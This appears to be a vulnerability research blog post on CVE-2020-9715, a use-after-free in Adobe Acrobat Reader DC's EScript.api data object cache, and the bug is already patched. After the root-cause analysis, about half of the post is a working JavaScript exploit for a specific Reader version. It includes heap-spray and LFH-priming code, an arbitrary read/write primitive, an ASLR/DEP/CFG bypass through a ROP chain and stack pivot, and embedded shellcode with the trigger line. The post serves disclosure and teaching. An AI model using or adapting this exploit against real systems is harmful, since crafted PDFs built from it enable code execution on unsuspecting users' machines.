A use-after-free vulnerability affects the data ESObject cache within the EScript.api module of Adobe Acrobat Reader DC. Although objects may be added to the cache using keys with ANSI or Unicode strings, objects are evicted from the cache by keys that contain only Unicode strings. This enables an attacker to cause a data ESObject to be freed, but its pointer to remain intact in the object cache entry. When the same JavaScript object is later accessed, its cache entry is found despite the corresponding data ESObject having been freed. This leads to a use-after-free condition. An attacker can exploit this vulnerability to achieve code execution by enticing a user to open a crafted PDF file.

The vulnerability analysis that follows is based on Adobe Acrobat Reader DC version 2020.009.20063 running on Windows 10 64-bit.

CVE-2020-9715

Before we dive into the vulnerability, we need to understand how embedded JavaScript is handled by Adobe Reader.

Adobe Reader has a built-in JavaScript engine based on Mozilla’s SpiderMonkey. Embedded JavaScript code in PDF files is processed and executed by the EScript.api module in Adobe Reader.

The Adobe Reader JavaScript engine uses several types of objects including ESObjects and JSObjects. ESObjects are internal to the EScript.api module and contain a pointer to the classical JavaScript objects, JSObjects.

Several kinds of ESObjects exist and among them is the data ESObject, which is a type of object used to represent embedded files and data streams. data ESObjects are uniquely identified by a key (referred to as cache_key in this post) that contains:

  • A pointer to a PDDoc object, which is an object that represents the PDF document.
  • The name of the data ESObject that is an ANSI or Unicode string containing the name of the embedded file.

References to data ESObjects are stored in a cache indexed by cache_key. When a new data ESObject is constructed with a certain name, a cache_key object is constructed with that name and is used to search the cache for the presence of the data ESObject that matches the name. If the search is a cache hit, a pointer to the data ESObject is returned. Otherwise, a new data ESObject is created and stored in the cache, and a pointer to it is returned.

The vulnerability occurs due to a mismatch in the encoding of the name string during the construction of cache_key used in the insertion and deletion phases in the lifecycle of a data ESObject. When a data ESObject is created and added to the cache, the name used in the cache_key retains the original encoding (ANSI or Unicode) found in the PDF document.

When a data ESObject is deleted from the cache, the name used in the cache_key is always encoded in Unicode. This leads to a condition where cache entries for data ESObject with ANSI names are never purged from cache; instead the cache entries retain pointers to freed data ESObjects indefinitely.

If an ANSI data ESObject is thus freed, and the code tries to create a new data ESObject with a matching name (e.g., when JavaScript code deletes this.dataObjects[0] and then accesses this.dataObjects[0]), a cache hit occurs but the pointer returned is the pointer to the ANSI-named data ESObject that was previously freed. This leads to an exploitable use-after-free condition.

Code Analysis

Lets take a look at how these objects are represented under the hood, and examine where the bug exists. Code listings show decompiled C code; source code is not available in the affected product. Structure definitions, function names, etc. are obtained by reverse engineering and may not accurately reflect those defined in the source code.

Structure Definitions

The cache mechanism is implemented with the use of a variant of Binary Search Trees. A pointer to the cache is kept in a global variable at EScript+0x273AAC, which points to a structure (named here as esobject_cache_st) defined as follows:

typedef struct esobject_cache_st {
  bst_node *root_node;
  int      *node_count;
  void     *unkonw;
} esobject_cache;

typedef struct bst_node_st {
  bst_node  *left;
  bst_node  *parent;
  bst_node  *right;
  int       node_type;
  cache_key *key;
  void      *esobject;
} bst_node;

A pointer to the cache_key structure is stored within each node in the cache. The cache_key structure is defined as follows:

typedef struct cache_key_st {
  void *pddoc;
  ESString *name;
} cache_key;

The cache_key structure contains the name of the embedded file in the form of an ESString structure, which is defined as follows:

typedef struct esstring_st {
  int  type;
  char *buffer;
  int  len;
  int  max_capacity;
  void *unknown1;
  void *unknown2;
} ESString;

In the structure above, the buffer member is a pointer to the string encoded in the format specified in the type member (1 for ANSI, 2 for Unicode). Its length is defined by the len member and the maximum capacity of the buffer is indicated by max_capacity. In Unicode ESString objects the buffer encoding is UTF-16 with Byte Order Mark (BOM).

Comparing Cache Keys

Any operation that requires traversing the tree require a key comparison function. This function is implemented at EScript+0x90770 and its code is listed below.

bool is_key_greater(cache_key *key1, cache_key *key2)
{
  ESString *data_object_name_from_cache;
  ESString *data_object_name;

[1]

  if ( a1->pddoc != key->pddoc )
    return a1->pddoc < (unsigned int)key->pddoc;
  name2 = key2->name;
  name1 = key1->name;
  return esstrings_compare(&name1, &name2);
}

The function first checks whether the keys belong to the same PDF document [1]. If they belong to the same PDF document then it proceeds to compare the names of the keys, which are ESString objects.

The ESString comparison function (implemented at EScript+0x45B07) is listed below.

bool esstrings_compare(ESString **name1, ESString **name2)
{
  ESString *type1;
  ESString *type2;
  bool v4;

  type1 = get_ESString_type(*name1);
  type2 = get_ESString_type(*name2);

[2]

  if ( type1 == type2 )
    v4 = (sub_23845B5E(*name1, *name2) & 0x8000u) != 0;
  else
    v4 = (int)type1 < (int)type2;
  return v4;
}

Relevant to this vulnerability is that at [2] there is a check that compares the ESString types. If they differ, the result of the function is true if type1 is less than type2. For example, when comparing two keys with the same name of different types where type1 is ANSI (1) and type2 is Unicode (2), the esstrings_compare function returns true.

When performing a lookup in the data ESObject cache, the function that implements it (EScript+0x90476) considers keys with the same name but different ESString types as different.

Deleting Cache Entries

When a data ESObject is freed, the corresponding cache entry that stores a pointer to the object is also freed. The ESObject deletion is implemented in the function at EScript+0x907B0, which is listed below.

__int16 delete_object(int a1)
{
  int v1;
  ESString *v2;
  wchar_t *v3;
  wchar_t *v4;
  esobject_cache_struct *cache_ptr;
  cache_key key;
  int v8[3];
  int v9;

  v1 = sub_23858B70(a1);

[1]

  v2 = (ESString *)sub_23844B00(a1, "DataObject");
  v3 = (wchar_t *)v2;
  if ( v1 )
  {
    if ( !v2 )
      return 1;
    v4 = (wchar_t *)get_dataobject_name(v2);
    v8[0] = (int)v4;
    v9 = 0;
    key.doc = v1;
    sub_23877D42(&key.name, (ESString **)v8);
    LOBYTE(v9) = 1;
    cache_ptr = initialize_data_esobject_cache(global_cache_ptr);

[2]

    remove_key_from_cache(cache_ptr, &key);
    LOBYTE(v9) = 2;
    if ( key.name )
      sub_23845AAE((wchar_t *)key.name);
    v9 = 3;
    if ( v4 )
      sub_23845AAE(v4);
    v9 = -1;
  }
  if ( v3 )
    sub_23845AAE(v3);
  return 1;
}

The call at [1] returns a pointer to an ESString object used to create the cache_key object. This is passed to the function that removes cache nodes matching the cache_key object at [2].

The vulnerability occurs because [1] returns a pointer to an ESString object whose type is always Unicode (ESString.type = 2). However, the ESString value of the keys stored in the cache nodes keeps the type that was used in the definition of the data object in the PDF file. If that name was defined as an ANSI string in the PDF file, the cache key would also be ANSI (ESString.type = 1).

Any lookup for a cache entry whose name was defined with an ANSI ESString is never found, since the created cache key used for the lookup is always a Unicode ESString. This prevents the cache node from being removed, leaving a stale pointer to the corresponding ESObject that is freed.

Accessing Deleted Objects

When the data ESObject cache contains entries that were not removed due to the ESString type mismatch problem, any attempt to access the freed object from JavaScript retrieves the stale pointer corresponding to that entry. Therefore, any operation on that pointer causes an access to memory that was already freed, triggering the use-after-free.

The function listed below handles accesses to data ESObjects and is implemented at EScript+0x929F0.

__int16 accessDataObjects(int a1, int a2, int a3)
{
  wchar_t *v3;
  int v5;
  int v6;
  int v7;
  ESString *v8;
  int v9;
  bool v10;
  wchar_t *v11;
  int v12;
  int freed_object_retrieved;
  int v14;
  int v15[3];
  wchar_t *v16;
  wchar_t *v17;
  wchar_t *v18;
  int v19;
  int v20;

  v3 = (wchar_t *)sub_23858B70(a1);
  v16 = v3;
  if ( !v3 )
    return sub_238AB500(a1, a2, 0, 14, 0);
  v17 = (wchar_t *)sub_238401C0((int *)a1);
  v5 = sub_2387DC8A(v3, v14);
  v6 = v5;
  v7 = 0;
  if ( v5 )
    v18 = (wchar_t *)custom_calloc(v5, 4);
  else
    v18 = 0;
  v8 = new_esstring(0, 1);
  v15[2] = (int)v8;
  v20 = 0;
  v9 = 0;
  v19 = 0;
  v10 = v6 == 0;
  if ( v6 > 0 )
  {
    v11 = v18;
    _mm_lfence();
    do
    {
      sub_2387DB6D(v16, v9, (int)v8);
      v12 = sub_2383D040(v17, 1);
      *(_DWORD *)&v11[2 * v19] = v12;
      v15[0] = (int)v16;

[1]

      v15[1] = get_ESString_buffer(v8);

[2]

      freed_object_retrieved = sub_23882310(v17, "Data", (wchar_t *)v15);

[3]

      sub_2383D430(*(int **)&v11[2 * v19], freed_object_retrieved);
      v9 = v19 + 1;
      v19 = v9;
    }
    while ( v9 < v6 );
    v7 = 0;
    v10 = v6 == 0;
  }
  if ( !v10 )
    v7 = sub_2385CE40(v17, v18, v6, 1);
  sub_2383D430((int *)a3, v7);
  if ( v6 )
    (*(void (__cdecl **)(wchar_t *))(dword_23A7538C + 12))(v18);
  v20 = 1;
  if ( v8 )
    sub_23845AAE((wchar_t *)v8);
  return 1;
}

The call at [1] triggers the creation of data ESObjects based on the data object name retrieved at [2]. This causes a cache lookup that returns the ESObject pointer of the corresponding cache entry that is then used in the call at [3].

Exploitation

We’ll now walk through how this vulnerability can be exploited to achieve arbitrary code execution. The following exploit is designed for Adobe Acrobat Reader DC version 2020.009.20063 running on Windows 10 x64.

A successful exploit strategy needs to bypass the following security mitigations on the target:

  • Address Space Layout Randomization (ASLR)
  • Data Execution Prevention (DEP)
  • Control Flow Guard (CFG)

In order to bypass all three mitigations, the following exploitation strategy is adopted:

  1. Spray a large number of ArrayBuffer objects with the correct size so they are adjacent to each other. The sprayed ArrayBuffer objects must contain a crafted fake Array object that is used to corrupt the adjacent ArrayBuffer.byteLength field (step 6).
  2. Prime the Low Fragmentation Heap (LFH) for size 0x48 (the size of the freed ESObject).
  3. Create and free the target ESObject.
  4. Spray crafted strings to allocate memory in the address used by the freed ESObject. The crafted string must contain a pointer to a predictable address where one of the fake Array objects created in step 1 would be.
  5. Trigger the ESObject reuse to obtain a handle to the fake Array in the exploit JavaScript code.
  6. Use the fake Array handle obtained in step 5 to write past the underlying ArrayBuffer boundaries and overwrite the byteLength field of the adjacent ArrayBuffer with the value 0xffffffff. This, combined with the creation of a DataView object on the corrupted ArrayBuffer allows reading from and writing to arbitrary memory addresses.
  7. Use the arbitrary read and write to write the ROP chain and shellcode.
  8. Overwrite a function pointer of the fake Array object and trigger its call to hijack the execution flow.

The following sub-sections break down the exploit code with explanations for better understanding.

Spraying ArrayBuffer Objects

When dealing with the heap, the addresses of allocations are not consistent between executions and thus can not be hardcoded into the exploit. In order to be able to place controlled memory regions in predictable addresses the internals of the memory manager have to be leveraged.

The heap spray technique performs a large number of controlled allocations with the intention of having adjacent regions of controllable memory. The key to obtaining adjacent memory regions is to make the allocations of a specific size.

In JavaScript, a convenient way of making allocations in the heap whose content is completely controlled is by using ArrayBuffer objects. The memory allocated with these objects can be read from and written to with the use of DataView objects.

In order to get a heap allocation of the right size the metadata of ArrayBuffer objects and heap chunks have to be taken into consideration. The internal representation of ArrayBuffer objects tells that the size of the metadata is 0x10 bytes. The size of the metadata of a busy heap chunk is 8 bytes.

Since the objective is to have adjacent memory regions filled with controlled data, the allocations performed must have the exact same size as the heap segment size, which is 0x10000 bytes. Therefore, the ArrayBuffer objects created during the heap spray must be of 0xffe8 bytes.

var SHIFT_ALIGNMENT = 4;
var FAKE_ARRAY_JSOBJ_ADDR = 0x40000058 + SHIFT_ALIGNMENT;
var HEAP_SEGMENT_SIZE = 0x10000
var ARRAY_BUFFER_SZ = HEAP_SEGMENT_SIZE-0x10-0x8

[1]

var arrayBufferSpray = new Array(0x8000);

function sprayArrayBuffers() {

    // Spray a large number of ArrayBuffers containing crafted data (a fake array)
    // so we end up with a fake JS array object at FAKE_ARRAY_JSOBJ_ADDR

    for (var i = 0; i < arrayBufferSpray.length; i++) {
        arrayBufferSpray[i] = new ArrayBuffer(ARRAY_BUFFER_SZ);
        var dv = new DataView(arrayBufferSpray[i]);


[2]

        // ArrayObject.shape_
        dv.setUint32(SHIFT_ALIGNMENT+0, FAKE_ARRAY_JSOBJ_ADDR+0x10, true);

        // ArrayObject.type_
        dv.setUint32(SHIFT_ALIGNMENT+4, FAKE_ARRAY_JSOBJ_ADDR+0x40, true);

        // ArrayObject.elements_
        dv.setUint32(SHIFT_ALIGNMENT+0xc, FAKE_ARRAY_JSOBJ_ADDR+0x80, true);

        // ArrayObject.shape_.base_
        dv.setUint32(SHIFT_ALIGNMENT+0x10, FAKE_ARRAY_JSOBJ_ADDR+0x20, true);

        // ArrayObject.shape_.base_.flags
        dv.setUint32(SHIFT_ALIGNMENT+0x20+0x10, 0x1000, true);

        // ArrayObject.type_.classp
        dv.setUint32(SHIFT_ALIGNMENT+0x40, FAKE_ARRAY_JSOBJ_ADDR+0x40+0x10, true);

        // ArrayObject.type_.classp.enumerate
        dv.setUint32(SHIFT_ALIGNMENT+0x40+0x10+0x1c, 0xdead1337, true);

        // ArrayObject.elements_.flags
        dv.setUint32(SHIFT_ALIGNMENT+0x80-0x10, 0, true);

        // ArrayObject.elements_.initializedLength
        dv.setUint32(SHIFT_ALIGNMENT+0x80-0x10+4, 0xffff, true);

        // ArrayObject.elements_.capacity
        dv.setUint32(SHIFT_ALIGNMENT+0x80-0x10+8, 0xffff, true);

        // ArrayObject.elements_.length
        dv.setUint32(SHIFT_ALIGNMENT+0x80-0x10+0xc, 0xffff, true);
    }
}

The exploit function listed above performs the ArrayBuffer spray. The total size of the spray defined in [1] was determined by setting a number high enough so an ArrayBuffer would be allocated at the selected predictable address defined by the FAKE_ARRAY_OBJ_ADDR global variable.

Each of the sprayed ArrayBuffer objects contain a crafted fake Array object [2]. To craft a fake Array objects not all the internal structures need to be provided. However, there are some important values that need to be chosen carefully:

  • Elements.initializedLength: The number of elements that have been initialized.
  • Elements.capacity: The number of allocated slots.
  • Elements.length: The length property of Array objects.

When the use-after-free condition is triggered, operations on the crafted Array object (set as values of the sprayed the ArrayBuffer object) include reading and writing to the Array. The eventual goal is to corrupt the byteLength field of an ArrayBuffer object (which is a well-known method to obtain a read and write primitive). By ensuring that the crafted Array object allows writing past the boundaries of the underlying ArrayBuffer object and into an adjacent ArrayBuffer, the adjacent ArrayBuffer can be desirably corrupted. Therefore, the values of the Array object properties need to be bigger than number of bytes that separate the start of the array from the next ArrayBuffer metadata.

Priming the Low Fragmentation Heap

The size of the object that is freed in this vulnerability is of 0x48 bytes (the size of an ESObject). Allocations with this size are likely to end up being handled by the Low Fragmentation Heap (LFH) if enough consecutive allocations of that size are performed.

In order to be able to allocate into the addresses of the freed ESObject, it is good to make sure that the object is handled by the LFH in order to reduce the possibility of the application uncontrollably allocating into that spot.

var lfhPrime = new Array(0x1000);

function primeLFH() {

    // Activate the LFH bucket for size 0x48 (real chunk size is 0x50) and help improve determinism.
    // We want the allocation of the UAFed object to fall in the LFH so we can claim its freed chunk more or less reliably.

[1]

    var baseString = "Prime the LFH!".repeat(100);
    for (var i = 0; i < lfhPrime.length; i++) {
        lfhPrime[i] = baseString.substring(0, 0x48 / 2 - 1).toUpperCase();
    }

[2]

    for (var i = 0; i < lfhPrime.length; i+=2) {
        lfhPrime[i] = null;
    }
}

The function listed above performs multiple allocations of size 0x48 [1] in order to activate the LFH bucket for that size. Activating the LFH for a specific size requires at least 0x11 consecutive allocations. However, since the application might require allocations of that specific size for other uses, some of the allocations are freed to reduce the possibility of it allocating into the freed ESObject spot [2].

Creating and Freeing the Vulnerable Object

Once the memory is laid out the ESObject has to be created, added into the cache, and then freed.

[1]

this.dataObjects[0].toString();

[2]

this.dataObjects[0] = null;

[3]

g_timeout = app.setTimeOut("triggerUAF()", 1000);

In the code listing above, [1] triggers the creation of the data ESObject that is stored in the object cache. Then, [2] removes the reference to it so when the Garbage Collector is triggered in [3] the ESObject is freed.

Allocating Into the Freed Spot

At this point the heap has been curated for allocation into the freed ESObject spot. To do so, a large number of allocations of size 0x48 have to be performed in order to have a chance of one landing into that spot.

[1]

var stringSpray = new Array(0x2000);

function sprayStrings() {
    // Spray strings of size 0x48/2-1 in order to eventually allocate into the spot left by the freed chunk
    var baseString = unescape(toUnescape(FAKE_ARRAY_JSOBJ_ADDR).repeat(0x48));
    for (var i = 0; i < stringSpray.length; i++) {
        stringSpray[i] = baseString.substring(0, 0x48 / 2 - 1).toLowerCase();
    }
}

The allocations are performed with a spray of the size defined at [1]. The value for this size is the double of the size selected for priming the LFH to make sure to fill the free spots left and also the ESObject spot.

The object used in the spray is a string, as it allows an easy control of the size and contents without any metadata overhead. The contents of the string is the unescaped value of the address where a fake Array object is expected to have been allocated during the initial ArrayBuffer spray. The unescape function is used to deal with Unicode transformation.

Achieving Arbitrary Read and Write

Once the predictable address occupies the spot in memory left by the freed ESObject and points to the fake Array object, an access to the data object provides a handle to that fake Array object that can be used as a normal Array. This can be achieved with the following line of code:

var fakeArrObj = this.dataObjects[0]

By carefully choosing the element of the fake Array to assign a value to, the adjacent ArrayBuffer can be corrupted. The interesting value to corrupt is the byteLength property. Following the byteLength field, the next value in memory is a pointer to the DataView object associated to the ArrayBuffer. It is important to take into account that this value can only be either a valid pointer or zero.

function getArbitraryRW(fakeArrObj) {
    var corruptedArrayBuffer = null;

[1]

    var nextABByteLengthOffset = ARRAY_BUFFER_SZ-0x10-0x70+0x8;
    fakeArrObj[nextABByteLengthOffset / 8] = 2.12199579047120666927013567069E-314;

[2]

    fakeArrObj[0] = this.addField("t", "text", 0, [0, 0, 0, 0 ]);
    fakeArrObj[0].value = "dummy1337w00t";

[3]

    for (var i = 0; i < arrayBufferSpray.length; i++) {
        if (arrayBufferSpray[i].byteLength == -1) {
            corruptedArrayBuffer = arrayBufferSpray[i];
        }
    }

[4]

    return new DataView(corruptedArrayBuffer);
}

In the code listing above, the byteLength value of the adjacent ArrayBuffer object is overwritten [1]. The integer value used translates to 0xFFFFFFFF 0x00000000 in memory due to the IEEE 754 representation for double values.

Aside from the ArrayBuffer corruption, a text field is created and assigned to the fake Array [2]. This is later used to leak a pointer to the AcroForm.api module, which is used to leak the icucnv58.dll module base address.

The next step is to locate the corrupted ArrayBuffer by checking the size of all the allocated buffers [3]. Finally, creating a DataView on the corrupted ArrayBuffer allows to read from and write to arbitrary memory addresses, since the size of the ArrayBuffer was set to 0xffffffff. However, the addresses specified when reading or writing memory are relative to the address where the corrupted ArrayBuffer is located. For convenience, the following helper functions were created to read and write memory using absolute addresses.

function readUint32(dataView, absoluteAddress) {
    var startAddr = FAKE_ARRAY_JSOBJ_ADDR-SHIFT_ALIGNMENT+HEAP_SEGMENT_SIZE;
    var addrOffset = absoluteAddress - startAddr;
    if (addrOffset < 0) {
        addrOffset = addrOffset + 0xffffffff + 1;
    }
    return dataView.getUint32(addrOffset, true);
}

function writeUint32(dataView, absoluteAddress, data) {
    var startAddr = FAKE_ARRAY_JSOBJ_ADDR-SHIFT_ALIGNMENT+HEAP_SEGMENT_SIZE;
    var addrOffset = absoluteAddress - startAddr;
    if (addrOffset < 0) {
        addrOffset = addrOffset + 0xffffffff + 1;
    }
    dataView.setUint32(addrOffset, data, true);
}

Writing and Executing the ROP Chain

The security mitigations present in the application determine the strategy and techniques required. ASLR and DEP force using Return Oriented Programming (ROP) combined with leaked pointers to the relevant modules. CFG forbids redirecting the execution flow via pointer overwrite to arbitrary addresses.

One way of bypassing the CFG restrictions is to redirect the execution flow to a module that was not built with CFG enabled. Adobe Acrobat Reader DC ships with some modules that do not have CFG enabled. The most convenient one for the current exploit is icucnv58.dll. Its large size (plenty of options for ROP gadgets) and the fact that it gets loaded at runtime if text fields are used (this module offers functions to handle Unicode data) makes it a perfect candidate.

Taking this into account, the strategy can be the following:

  1. Obtain pointers to the relevant modules to calculate their base addresses.
  2. Pivot the stack to a memory region under our control where the addresses of the ROP gadgets can be written.
  3. Write the shellcode.
  4. Call VirtualProtect to change the shellcode memory region permissions to allow execution.
  5. Overwrite a function pointer that can be called later from JavaScript.

The following code implements the mentioned strategy:

function writePayload(dv) {

[1]

    var escriptAddrDelta = 0x275528;
    var fakeArrObjElementsPtr = readUint32(dv, FAKE_ARRAY_JSOBJ_ADDR+0xC);
    var escriptBaseAddr = readUint32(dv, readUint32(dv, fakeArrObjElementsPtr)+0xc) - escriptAddrDelta;

[2]

    var acroFormAddrDelta = 0x2827d0;
    var acroFormBaseAddr = readUint32(dv, readUint32(dv, readUint32(dv, fakeArrObjElementsPtr)+0x10)+0x34) - acroFormAddrDelta;

[3]

    var icucnv58AddrDelta = 0xc3ad8c;
    var icucnv58BaseAddr = readUint32(dv, readUint32(dv, acroFormBaseAddr+icucnv58AddrDelta)+0x10);

[4]

    var kernel32BaseAddr = readUint32(dv, escriptBaseAddr+0x273ED0);

[5]

    // Stack pivot
    //    0x95907: mov esp, 0x59000008; ret;
    var stackPivot = icucnv58BaseAddr+0x95907;

[6]

    var virtualProtectStubDelta = 0x20420;
    writeUint32(dv, 0x59000008, kernel32BaseAddr+virtualProtectStubDelta);

[7]

    // VirtualProtect parameters
    writeUint32(dv, 0x59000008+4, SHELLCODE_ADDR);
    writeUint32(dv, 0x59000008+8, SHELLCODE_ADDR);
    writeUint32(dv, 0x59000008+12, SHELLCODE_BUFFER_SZ);
    writeUint32(dv, 0x59000008+16, 0x40);
    writeUint32(dv, 0x59000008+20, fakeArrObjElementsPtr+0x8);

    // Write the shellcode
    shellcode = [0x0082e8fc, 0x89600000, 0x64c031e5, 0x8b30508b, 0x528b0c52, 0x28728b14, 0x264ab70f, 0x3cacff31,
    0x2c027c61, 0x0dcfc120, 0xf2e2c701, 0x528b5752, 0x3c4a8b10, 0x78114c8b, 0xd10148e3, 0x20598b51,
    0x498bd301, 0x493ae318, 0x018b348b, 0xacff31d6, 0x010dcfc1, 0x75e038c7, 0xf87d03f6, 0x75247d3b,
    0x588b58e4, 0x66d30124, 0x8b4b0c8b, 0xd3011c58, 0x018b048b, 0x244489d0, 0x615b5b24, 0xff515a59,
    0x5a5f5fe0, 0x8deb128b, 0x8d016a5d, 0x0000b285, 0x31685000, 0xff876f8b, 0xb5f0bbd5, 0xa66856a2,
    0xff9dbd95, 0x7c063cd5, 0xe0fb800a, 0x47bb0575, 0x6a6f7213, 0xd5ff5300, 0x636c6163, 0x00000000]

[8]

    for (var i = 0; i < shellcode.length; i++) {
        writeUint32(dv, SHELLCODE_ADDR+i*4, shellcode[i]);
    }

[9]

    // Overwrite the fake array ArrayObject.type_.classp.enumerate pointer to achieve EIP control
    writeUint32(dv, FAKE_ARRAY_JSOBJ_ADDR+0x40+0x10+0x1c, stackPivot);
}

In the code listing above, at [1], [2], [3], and [4] the base addresses of the EScript.api, AcroForm.api, icucnv58.dll, and Kernel32.dll modules are obtained. At [5] the address to the stack pivot gadget is calculated. The function pointer selected to hijack the execution flow does not allow controlling any other CPU register, so the stack pivot gadget selected (mov esp, 0x59000008; ret) relocates the stack to 0x59000008, where the address of the VirtualProtect function [6] and the parameters passed to it are written [7]. Finally, the shellcode is written [8] and the fake Array object internal pointer ArrayObject.type_.classp.enumerate is overwritten with the address of the stack pivot gadget [9].

The last step is to trigger the execution of the ROP chain by assigning a value to an nonexistent property of the fake Array object. This would call the internal enumerate function as it should define all the lazy properties not yet reflected in the object. This can be done with the following line of code:

fakeArrObj.triggerRopchain = 2;

Conclusion

Adobe patched this vulnerability in August 2020. However it is likely that more vulnerabilities of this nature will continue to pop up in Adobe Reader given its large attack surface. We hope you enjoyed reading our analysis and learned something new. Be sure to checkout our other blog posts such as Firefox vulnerability research and patch-gapping Chrome.